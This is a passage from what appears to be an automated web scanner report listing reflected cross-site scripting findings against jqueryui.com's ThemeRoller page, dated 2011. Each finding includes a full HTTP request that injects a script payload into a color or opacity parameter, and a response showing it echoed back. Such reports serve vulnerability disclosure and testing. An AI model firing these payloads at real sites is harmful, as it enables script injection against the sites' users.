GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d67"><script>alert(1)</script>7e0b5c6406d was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c7b8"><script>alert(1)</script>81f4ae42993 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8e9"><script>alert(1)</script>bc1b48b47cf was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c7"><script>alert(1)</script>22b07013f0d was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconCo
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3477"><script>alert(1)</script>00ee690a072 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=4
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a648"><script>alert(1)</script>1c587b6ed83 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b7"><script>alert(1)</script>1e318d1330f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6071a"><script>alert(1)</script>90cbce80a0e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d510"><script>alert(1)</script>ecb5ac790e0 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgI